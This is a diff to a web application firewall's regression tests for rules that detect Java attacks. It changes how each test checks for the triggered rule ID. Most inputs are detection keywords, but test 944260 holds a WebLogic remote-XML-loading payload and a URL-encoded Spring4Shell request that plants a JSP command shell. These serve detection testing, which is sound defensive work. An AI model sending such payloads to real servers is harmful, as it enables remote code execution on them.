"HTTP/1.0" data: "test=value" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 6 desc: "XML attribute value includes keyword runtime.clonetransformer" stages: @@ -120,7 +125,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 7 desc: "XML element value includes keyword runtime.clonetransformer" stages: @@ -139,7 +145,8 @@ tests: version: "HTTP/1.0" data: "runtime.clonetransformer" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 8 desc: "Nested XML element value includes keyword runtime.clonetransformer" stages: @@ -158,7 +165,8 @@ tests: version: "HTTP/1.0" data: "runtime.clonetransformer" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 9 desc: "Content-Type text/plain includes keyword runtime.clonetransformer" stages: 
@@ -177,7 +185,8 @@ tests: version: "HTTP/1.0" data: "test=runtime.clonetransformer" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 10 desc: "Content-Type application/json arg value includes keyword runtime.clonetransformer" stages: @@ -196,7 +205,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"runtime.clonetransformer\"}" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 11 desc: "Content-Type application/json arg name includes keyword runtime.clonetransformer" stages: @@ -215,7 +225,8 @@ tests: version: "HTTP/1.0" data: "{\"runtime.clonetransformer\": \"test\"}" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 12 desc: "Argument test includes keyword runtime.forclosure" stages: @@ -234,7 +245,8 @@ tests: version: "HTTP/1.0" data: "test=runtime.forclosure" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 13 desc: "Argument name includes keyword runtime.forclosure" stages: @@ -253,7 +265,8 @@ tests: version: "HTTP/1.0" data: "runtime.forclosure=test" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 14 desc: "Cookie test includes keyword runtime.forclosure" stages: @@ -273,7 +286,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 15 desc: "Cookie name includes keyword runtime.forclosure" stages: @@ -293,7 +307,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 16 desc: "Request header test includes keyword runtime.forclosure" stages: @@ -313,7 +328,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 17 desc: "XML attribute value includes keyword runtime.forclosure" stages: 
@@ -332,7 +348,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 18 desc: "XML element value includes keyword runtime.forclosure" stages: @@ -351,7 +368,8 @@ tests: version: "HTTP/1.0" data: "runtime.forclosure" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 19 desc: "Nested XML element value includes keyword runtime.forclosure" stages: @@ -370,7 +388,8 @@ tests: version: "HTTP/1.0" data: "runtime.forclosure" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 20 desc: "Content-Type text/plain includes keyword runtime.forclosure" stages: @@ -389,7 +408,8 @@ tests: version: "HTTP/1.0" data: "test=runtime.forclosure" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 21 desc: "Content-Type application/json arg value includes keyword runtime.forclosure" stages: @@ -408,7 +428,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"runtime.forclosure\"}" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 22 desc: "Content-Type application/json arg name includes keyword runtime.forclosure" stages: @@ -427,7 +448,8 @@ tests: version: "HTTP/1.0" data: "{\"runtime.forclosure\": \"test\"}" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 23 desc: "Argument test includes keyword runtime.instantiatefactory" stages: @@ -446,7 +468,8 @@ tests: version: "HTTP/1.0" data: "test=runtime.instantiatefactory" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 24 desc: "Argument name includes keyword runtime.instantiatefactory" stages: @@ -465,7 +488,8 @@ tests: version: "HTTP/1.0" data: "runtime.instantiatefactory=test" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 25 desc: "Cookie test includes keyword runtime.instantiatefactory" stages: 
@@ -485,7 +509,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 26 desc: "Cookie name includes keyword runtime.instantiatefactory" stages: @@ -505,7 +530,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 27 desc: "Request header test includes keyword runtime.instantiatefactory" stages: @@ -525,7 +551,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 28 desc: "XML attribute value includes keyword runtime.instantiatefactory" stages: @@ -544,7 +571,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 29 desc: "XML element value includes keyword runtime.instantiatefactory" stages: @@ -563,7 +591,8 @@ tests: version: "HTTP/1.0" data: "runtime.instantiatefactory" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 30 desc: "Nested XML element value includes keyword runtime.instantiatefactory" stages: @@ -582,7 +611,8 @@ tests: version: "HTTP/1.0" data: "runtime.instantiatefactory" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 31 desc: "Content-Type text/plain includes keyword runtime.instantiatefactory" stages: @@ -601,7 +631,8 @@ tests: version: "HTTP/1.0" data: "test=runtime.instantiatefactory" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 32 desc: "Content-Type application/json arg value includes keyword runtime.instantiatefactory" stages: @@ -620,7 +651,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"runtime.instantiatefactory\"}" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 33 desc: "Content-Type application/json arg name includes keyword runtime.instantiatefactory" stages: 
@@ -639,7 +671,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"runtime.instantiatefactory\": \"test\"}"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 34
 desc: "Argument test includes keyword runtime.instantiatetransformer"
 stages:
@@ -658,7 +691,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=runtime.instantiatetransformer"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 35
 desc: "Argument name includes keyword runtime.instantiatetransformer"
 stages:
@@ -677,7 +711,8 @@ tests:
 version: "HTTP/1.0"
 data: "runtime.instantiatetransformer=test"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 36
 desc: "Cookie test includes keyword runtime.instantiatetransformer"
 stages:
@@ -697,7 +732,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 37
 desc: "Cookie name includes keyword runtime.instantiatetransformer"
 stages:
@@ -717,7 +753,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 38
 desc: "Request header test includes keyword runtime.instantiatetransformer"
 stages:
@@ -737,7 +774,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 39
 desc: "XML attribute value includes keyword runtime.instantiatetransformer"
 stages:
@@ -756,7 +794,8 @@ tests:
 version: "HTTP/1.0"
 data: "element_value"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 40
 desc: "XML element value includes keyword runtime.instantiatetransformer"
 stages:
@@ -775,7 +814,8 @@ tests:
 version: "HTTP/1.0"
 data: "runtime.instantiatetransformer"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 41
 desc: "Nested XML element value includes keyword runtime.instantiatetransformer"
 stages:
@@ -794,7 +834,8 @@ tests:
 version: "HTTP/1.0"
 data: "runtime.instantiatetransformer"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 42
 desc: "Content-Type text/plain includes keyword runtime.instantiatetransformer"
 stages:
@@ -813,7 +854,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=runtime.instantiatetransformer"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 43
 desc: "Content-Type application/json arg value includes keyword runtime.instantiatetransformer"
 stages:
@@ -832,7 +874,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"test\": \"runtime.instantiatetransformer\"}"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 44
 desc: "Content-Type application/json arg name includes keyword runtime.instantiatetransformer"
 stages:
@@ -851,7 +894,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"runtime.instantiatetransformer\": \"test\"}"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 45
 desc: "Argument test includes keyword runtime.invokertransformer"
 stages:
@@ -870,7 +914,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=runtime.invokertransformer"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 46
 desc: "Argument name includes keyword runtime.invokertransformer"
 stages:
@@ -889,7 +934,8 @@ tests:
 version: "HTTP/1.0"
 data: "runtime.invokertransformer=test"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 47
 desc: "Cookie test includes keyword runtime.invokertransformer"
 stages:
@@ -909,7 +955,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 48
 desc: "Cookie name includes keyword runtime.invokertransformer"
 stages:
@@ -929,7 +976,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 49
 desc: "Request header test includes keyword runtime.invokertransformer"
 stages:
@@ -949,7 +997,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 50
 desc: "XML attribute value includes keyword runtime.invokertransformer"
 stages:
@@ -968,7 +1017,8 @@ tests:
 version: "HTTP/1.0"
 data: "element_value"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 51
 desc: "XML element value includes keyword runtime.invokertransformer"
 stages:
@@ -987,7 +1037,8 @@ tests:
 version: "HTTP/1.0"
 data: "runtime.invokertransformer"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 52
 desc: "Nested XML element value includes keyword runtime.invokertransformer"
 stages:
@@ -1006,7 +1057,8 @@ tests:
 version: "HTTP/1.0"
 data: "runtime.invokertransformer"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 53
 desc: "Content-Type text/plain includes keyword runtime.invokertransformer"
 stages:
@@ -1025,7 +1077,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=runtime.invokertransformer"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 54
 desc: "Content-Type application/json arg value includes keyword runtime.invokertransformer"
 stages:
@@ -1044,7 +1097,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"test\": \"runtime.invokertransformer\"}"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 55
 desc: "Content-Type application/json arg name includes keyword runtime.invokertransformer"
 stages:
@@ -1063,7 +1117,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"runtime.invokertransformer\": \"test\"}"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 56
 desc: "Argument test includes keyword runtime.prototypeclonefactory"
 stages:
@@ -1082,7 +1137,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=runtime.prototypeclonefactory"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 57
 desc: "Argument name includes keyword runtime.prototypeclonefactory"
 stages:
@@ -1101,7 +1157,8 @@ tests:
 version: "HTTP/1.0"
 data: "runtime.prototypeclonefactory=test"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 58
 desc: "Cookie test includes keyword runtime.prototypeclonefactory"
 stages:
@@ -1121,7 +1178,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 59
 desc: "Cookie name includes keyword runtime.prototypeclonefactory"
 stages:
@@ -1141,7 +1199,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 60
 desc: "Request header test includes keyword runtime.prototypeclonefactory"
 stages:
@@ -1161,7 +1220,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 61
 desc: "XML attribute value includes keyword runtime.prototypeclonefactory"
 stages:
@@ -1180,7 +1240,8 @@ tests:
 version: "HTTP/1.0"
 data: "element_value"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 62
 desc: "XML element value includes keyword runtime.prototypeclonefactory"
 stages:
@@ -1199,7 +1260,8 @@ tests:
 version: "HTTP/1.0"
 data: "runtime.prototypeclonefactory"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 63
 desc: "Nested XML element value includes keyword runtime.prototypeclonefactory"
 stages:
@@ -1218,7 +1280,8 @@ tests:
 version: "HTTP/1.0"
 data: "runtime.prototypeclonefactory"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 64
 desc: "Content-Type text/plain includes keyword runtime.prototypeclonefactory"
 stages:
@@ -1237,7 +1300,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=runtime.prototypeclonefactory"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 65
 desc: "Content-Type application/json arg value includes keyword runtime.prototypeclonefactory"
 stages:
@@ -1256,7 +1320,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"test\": \"runtime.prototypeclonefactory\"}"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 66
 desc: "Content-Type application/json arg name includes keyword runtime.prototypeclonefactory"
 stages:
@@ -1275,7 +1340,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"runtime.prototypeclonefactory\": \"test\"}"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 67
 desc: "Argument test includes keyword runtime.prototypeserializationfactory"
 stages:
@@ -1294,7 +1360,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=runtime.prototypeserializationfactory"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 68
 desc: "Argument name includes keyword runtime.prototypeserializationfactory"
 stages:
@@ -1313,7 +1380,8 @@ tests:
 version: "HTTP/1.0"
 data: "runtime.prototypeserializationfactory=test"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 69
 desc: "Cookie test includes keyword runtime.prototypeserializationfactory"
 stages:
@@ -1333,7 +1401,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 70
 desc: "Cookie name includes keyword runtime.prototypeserializationfactory"
 stages:
@@ -1353,7 +1422,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 71
 desc: "Request header test includes keyword runtime.prototypeserializationfactory"
 stages:
@@ -1373,7 +1443,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 72
 desc: "XML attribute value includes keyword runtime.prototypeserializationfactory"
 stages:
@@ -1392,7 +1463,8 @@ tests:
 version: "HTTP/1.0"
 data: "element_value"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 73
 desc: "XML element value includes keyword runtime.prototypeserializationfactory"
 stages:
@@ -1411,7 +1483,8 @@ tests:
 version: "HTTP/1.0"
 data: "runtime.prototypeserializationfactory"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 74
 desc: "Nested XML element value includes keyword runtime.prototypeserializationfactory"
 stages:
@@ -1430,7 +1503,8 @@ tests:
 version: "HTTP/1.0"
 data: "runtime.prototypeserializationfactory"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 75
 desc: "Content-Type text/plain includes keyword runtime.prototypeserializationfactory"
 stages:
@@ -1449,7 +1523,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=runtime.prototypeserializationfactory"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 76
 desc: "Content-Type application/json arg value includes keyword runtime.prototypeserializationfactory"
 stages:
@@ -1468,7 +1543,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"test\": \"runtime.prototypeserializationfactory\"}"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 77
 desc: "Content-Type application/json arg name includes keyword runtime.prototypeserializationfactory"
 stages:
@@ -1487,7 +1563,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"runtime.prototypeserializationfactory\": \"test\"}"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 78
 desc: "Argument test includes keyword runtime.whileclosure"
 stages:
@@ -1506,7 +1583,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=runtime.whileclosure"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 79
 desc: "Argument name includes keyword runtime.whileclosure"
 stages:
@@ -1525,7 +1603,8 @@ tests:
 version: "HTTP/1.0"
 data: "runtime.whileclosure=test"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 80
 desc: "Cookie test includes keyword runtime.whileclosure"
 stages:
@@ -1545,7 +1624,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 81
 desc: "Cookie name includes keyword runtime.whileclosure"
 stages:
@@ -1565,7 +1645,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 82
 desc: "Request header test includes keyword runtime.whileclosure"
 stages:
@@ -1585,7 +1666,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 83
 desc: "XML attribute value includes keyword runtime.whileclosure"
 stages:
@@ -1604,7 +1686,8 @@ tests:
 version: "HTTP/1.0"
 data: "element_value"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 84
 desc: "XML element value includes keyword runtime.whileclosure"
 stages:
@@ -1623,7 +1706,8 @@ tests:
 version: "HTTP/1.0"
 data: "runtime.whileclosure"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 85
 desc: "Nested XML element value includes keyword runtime.whileclosure"
 stages:
@@ -1642,7 +1726,8 @@ tests:
 version: "HTTP/1.0"
 data: "runtime.whileclosure"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 86
 desc: "Content-Type text/plain includes keyword runtime.whileclosure"
 stages:
@@ -1661,7 +1746,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=runtime.whileclosure"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 87
 desc: "Content-Type application/json arg value includes keyword runtime.whileclosure"
 stages:
@@ -1680,7 +1766,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"test\": \"runtime.whileclosure\"}"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
 - test_id: 88
 desc: "Content-Type application/json arg name includes keyword runtime.whileclosure"
 stages:
@@ -1699,4 +1786,5 @@ tests:
 version: "HTTP/1.0"
 data: "{\"runtime.whileclosure\": \"test\"}"
 output:
- log_contains: "id \"944240\""
+ log:
+ expect_ids: [944240]
diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml
index e01631dc0..19789faf8 100644
--- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml
+++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml
@@ -22,7 +22,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=java.evil.runtime"
 output:
- log_contains: "id \"944250\""
+ log:
+ expect_ids: [944250]
 - test_id: 2
 desc: "Argument name includes keyword java.evil.runtime"
 stages:
@@ -41,7 +42,8 @@ tests:
 version: "HTTP/1.0"
 data: "java.evil.runtime=test"
 output:
- log_contains: "id \"944250\""
+ log:
+ expect_ids: [944250]
 - test_id: 3
 desc: "Cookie test includes keyword java.evil.runtime"
 stages:
@@ -61,7 +63,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944250\""
+ log:
+ expect_ids: [944250]
 - test_id: 4
 desc: "Cookie name includes keyword java.evil.runtime"
 stages:
@@ -81,7 +84,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944250\""
+ log:
+ expect_ids: [944250]
 - test_id: 5
 desc: "Request header test includes keyword java.evil.runtime"
 stages:
@@ -101,7 +105,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944250\""
+ log:
+ expect_ids: [944250]
 - test_id: 6
 desc: "XML attribute value includes keyword java.evil.runtime"
 stages:
@@ -120,7 +125,8 @@ tests:
 version: "HTTP/1.0"
 data: "element_value"
 output:
- log_contains: "id \"944250\""
+ log:
+ expect_ids: [944250]
 - test_id: 7
 desc: "XML element value includes keyword java.evil.runtime"
 stages:
@@ -139,7 +145,8 @@ tests:
 version: "HTTP/1.0"
 data: "java.evil.runtime"
 output:
- log_contains: "id \"944250\""
+ log:
+ expect_ids: [944250]
 - test_id: 8
 desc: "Nested XML element value includes keyword java.evil.runtime"
 stages:
@@ -158,7 +165,8 @@ tests:
 version: "HTTP/1.0"
 data: "java.evil.runtime"
 output:
- log_contains: "id \"944250\""
+ log:
+ expect_ids: [944250]
 - test_id: 9
 desc: "Content-Type text/plain includes keyword java.evil.runtime"
 stages:
@@ -177,7 +185,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=java.evil.runtime"
 output:
- log_contains: "id \"944250\""
+ log:
+ expect_ids: [944250]
 - test_id: 10
 desc: "Content-Type application/json arg value includes keyword java.evil.runtime"
 stages:
@@ -196,7 +205,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"test\": \"java.evil.runtime\"}"
 output:
- log_contains: "id \"944250\""
+ log:
+ expect_ids: [944250]
 - test_id: 11
 desc: "Content-Type application/json arg name includes keyword java.evil.runtime"
 stages:
@@ -215,7 +225,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"java.evil.runtime\": \"test\"}"
 output:
- log_contains: "id \"944250\""
+ log:
+ expect_ids: [944250]
 - test_id: 12
 desc: "Argument test includes keyword java.evil.processbuilder"
 stages:
@@ -234,7 +245,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=java.evil.processbuilder"
 output:
- log_contains: "id \"944250\""
+ log:
+ expect_ids: [944250]
 - test_id: 13
 desc: "Argument name includes keyword java.evil.processbuilder"
 stages:
@@ -253,7 +265,8 @@ tests:
 version: "HTTP/1.0"
 data: "java.evil.processbuilder=test"
 output:
- log_contains: "id \"944250\""
+ log:
+ expect_ids: [944250]
 - test_id: 14
 desc: "Cookie test includes keyword java.evil.processbuilder"
 stages:
@@ -273,7 +286,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944250\""
+ log:
+ expect_ids: [944250]
 - test_id: 15
 desc: "Cookie name includes keyword java.evil.processbuilder"
 stages:
@@ -293,7 +307,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944250\""
+ log:
+ expect_ids: [944250]
 - test_id: 16
 desc: "Request header test includes keyword java.evil.processbuilder"
 stages:
@@ -313,7 +328,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944250\""
+ log:
+ expect_ids: [944250]
 - test_id: 17
 desc: "XML attribute value includes keyword java.evil.processbuilder"
 stages:
@@ -332,7 +348,8 @@ tests:
 version: "HTTP/1.0"
 data: "element_value"
 output:
- log_contains: "id \"944250\""
+ log:
+ expect_ids: [944250]
 - test_id: 18
 desc: "XML element value includes keyword java.evil.processbuilder"
 stages:
@@ -351,7 +368,8 @@ tests:
 version: "HTTP/1.0"
 data: "java.evil.processbuilder"
 output:
- log_contains: "id \"944250\""
+ log:
+ expect_ids: [944250]
 - test_id: 19
 desc: "Nested XML element value includes keyword java.evil.processbuilder"
 stages:
@@ -370,7 +388,8 @@ tests:
 version: "HTTP/1.0"
 data: "java.evil.processbuilder"
 output:
- log_contains: "id \"944250\""
+ log:
+ expect_ids: [944250]
 - test_id: 20
 desc: "Content-Type text/plain includes keyword java.evil.processbuilder"
 stages:
@@ -389,7 +408,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=java.evil.processbuilder"
 output:
- log_contains: "id \"944250\""
+ log:
+ expect_ids: [944250]
 - test_id: 21
 desc: "Content-Type application/json arg value includes keyword java.evil.processbuilder"
 stages:
@@ -408,7 +428,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"test\": \"java.evil.processbuilder\"}"
 output:
- log_contains: "id \"944250\""
+ log:
+ expect_ids: [944250]
 - test_id: 22
 desc: "Content-Type application/json arg name includes keyword java.evil.processbuilder"
 stages:
@@ -427,4 +448,5 @@ tests:
 version: "HTTP/1.0"
 data: "{\"java.evil.processbuilder\": \"test\"}"
 output:
- log_contains: "id \"944250\""
+ log:
+ expect_ids: [944250]
diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml
index 82eaddb4e..bf411fe7c 100644
--- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml
+++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml
@@ -19,7 +19,8 @@ tests:
 version: "HTTP/1.1"
 data: "_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://127.1.2.3/wb.xml')"
 output:
- log_contains: "id \"944260\""
+ log:
+ expect_ids: [944260]
 - test_id: 2
 desc: "Spring Framework RCE"
 stages:
@@ -35,4 +36,5 @@ tests:
 version: "HTTP/1.1"
 data: "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
 output:
- log_contains: "id \"944260\""
+ log:
+ expect_ids: [944260]
diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml
index 15685453b..dc8a22494 100644
--- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml
+++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml
@@ -22,7 +22,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=cnVudGltZQ"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 2
 desc: "Argument name includes keyword cnVudGltZQ"
 stages:
@@ -41,7 +42,8 @@ tests:
 version: "HTTP/1.0"
 data: "cnVudGltZQ=test"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 3
 desc: "Cookie test includes keyword cnVudGltZQ"
 stages:
@@ -61,7 +63,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 4
 desc: "Cookie name includes keyword cnVudGltZQ"
 stages:
